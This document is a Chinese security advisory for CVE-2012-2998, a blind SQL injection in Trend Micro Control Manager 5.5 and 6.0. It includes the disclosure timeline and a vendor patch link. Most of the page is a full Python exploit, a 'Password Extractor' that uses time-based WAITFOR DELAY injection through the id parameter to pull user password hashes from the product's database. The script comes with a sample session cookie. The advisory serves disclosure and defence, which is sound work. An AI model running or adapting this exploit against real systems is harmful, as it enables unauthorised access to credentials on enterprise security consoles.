发布日期：2012-09-27
更新日期：2012-09-28

受影响系统：

Trend Micro Control Manager 6.0
Trend Micro Control Manager 5.5

描述：

---

BUGTRAQ  ID: 55706
CVE ID: CVE-2012-2998

Trend Micro Control Manager可在自动进行日常安全控制任务的同时跟踪安全性能、报告恶意事件和策略违规。

Trend Micro Control Manager存在SQL注入漏洞，通过id参数传递到AdHocQuery_Processor.aspx的输入没有正确过滤即用在SQL查询中，成功利用后可允许攻击者控制应用、访问或修改数据、利用下层数据库内的其他漏洞。

<*来源：Tom Gregory
  
  链接：http://secunia.com/advisories/50760/
        http://secunia.com/advisories/50748/
        http://esupport.trendmicro.com/solution/en-us/1061043.aspx
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/bin/env python

# Exploit Title: Trend Micro Control Manager 5.5/6.0 AdHocQuery BlindSQL Injection (post-auth)
# Disclosure Date: 09/27/2012
# Author: otoy (@otoy_rood) & modpr0be (@modpr0be)
# Contact: research[at]spentera.com
# Platform: Windows
# Tested on: Windows 2003 Standard Edition
# Software Link: http://www.trendmicro.com/ftp/products/tmcm/CM6_Package.zip
# References: http://www.spentera.com/2012/09/trend-micro-control-manager-sql-injection-and-xss-vulnerability/
# CVE-ID: CVE-2012-2998

### Software Description
# Trend Micro Control Manager is a centralized security management for the enterprise.
# The web-based management console tracks security performance, reports malware events and
# policy violations, and automates routine tasks. New features include a customizable dashboard
# and at-a-glance access to threat statistics from the Trend Micro Smart Protection Network,
# Trend Micro's cloud-based security infrastructure.

### Vulnerability Details
# Vulnerability found in AdHocQuery module inside the id parameter. By injecting payload after the
# id parameter, let say ' WAITFOR DELAY '0:0:5'-- the web application hung for 5 seconds,
# which gives us a conclusion that the web application is vulnerable to time-based sql injection.

# The script below is just a proof of concept, you must get a cookie. This vulnerability will need some
# attack vectors to be exploited, but it is still a vulnerability.
# Remember to set the cookie first.

### Disclosure Timeline
# 07/23/2012 - Bug found
# 07/25/2012 - Reported to CERT/CC
# 07/26/2012 - Reported to JPCERT/CC
# 08/14/2012 - Vendor received the vulnerability
# 09/20/2012 - Vendor acknowledged the vulnerability
# 09/27/2012 - Public advisory released


import sys,time,urllib,urllib2

print """
#===============================================================#
|                                                               |
|            ___|                   |                           |
|          \___ \  __ \   _ \ __ \  __|  _ \  __| _` |          |
|                | |   |  __/ |   | |    __/ |   (   |          |
|          _____/  .__/ \___|_|  _|\__|\___|_|  \__,_|          |
|                 _|                                            |
|                                                               |
|    Trend Micro Control Manager BlindSQLi Password Extractor   |
|                         CVE-2012-2998             |
|          by otoy & modpr0be (research[at]spentera.com)    |
|                                                               |
#===============================================================#
"""
host = raw_input("[+] Target IP: ")
target = 'https://%s/webapp/AdHocQuery/AdHocQuery_Processor.aspx' %(host)
#SQLi delay, for remote target increase the delay time (default: 2 seconds)
delay=2

cookie = ("ASP_NET_SessionId=pazibiigfom13ijbaaqxxx55; .ASPXAUTH=582E40E7A78D452B18EF6719DE422CE121E3E7793E2FB661679753C1DCA50D9F7873CFF37BAF54AB3CCD84F5899D930A5D190F2C99552739F1C19FAF80F3EEE444951D0C9B7F6FD707E83BFC02ABD21D; WFINFOR=test")

def Hex2Des(item):
        return ord(hex(item).replace('0x',''))

def konek(m,n):
    #borrow from SQLmap :)
    query=("' IF(UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(Password AS NVARCHAR(4000)),CHAR(32))) FROM db_ControlManager.dbo.tb_UserInfo"
           " WHERE CONVERT(NVARCHAR(4000),Password)>CHAR(32)),%s,1)) > %s) WAITFOR DELAY '0:0:%s'--" %(m,n,delay))

    values = { 'Action': 'View',            
               'id': '350b651c-15c5-45ca-8d64-33b20f3fc4d8'+query,
               'asc': 'true',
               'Sort': 7,
               'paging': 10 }
  
    url = "%s?%s" % (target, urllib.urlencode(values))
    req = urllib2.Request(url)                        
    req.add_header('Cookie', cookie)                
    try:                                      
            starttime=time.time()
            response = urllib2.urlopen(req)    
            endtime = time.time()
            return int(endtime-starttime)
    except:                                            
            print '\n[-] Uh oh! Exploit fail..'              
            sys.exit(0)

print "[+] Using Time-Based method with %ds delay."%int(delay)
print "[+] Starting to extract hash from the first user."
sys.stdout.write('[+] Here is the hash : ')
sys.stdout.flush()

starttime = time.time()
for m in range(1,33):
    for n in range(0,16):
        wkttunggu = konek(m,Hex2Des(n))
        if (wkttunggu < delay):            
            sys.stdout.write(chr(Hex2Des(n)))
            sys.stdout.flush()
            break
endtime = time.time()
print "\n[+] Done! Hash extracted in %d seconds" %int(endtime-starttime)

建议：

---

厂商补丁：

Trend Micro
-----------
Trend Micro已经为此发布了一个安全公告（1061043）以及相应补丁:

1061043：Critical patch available for SQL injection attacks in Control Manager (TMCM)

链接：http://esupport.trendmicro.com/solution/en-us/1061043.aspx

浏览次数：3390
严重程度：0（网友投票）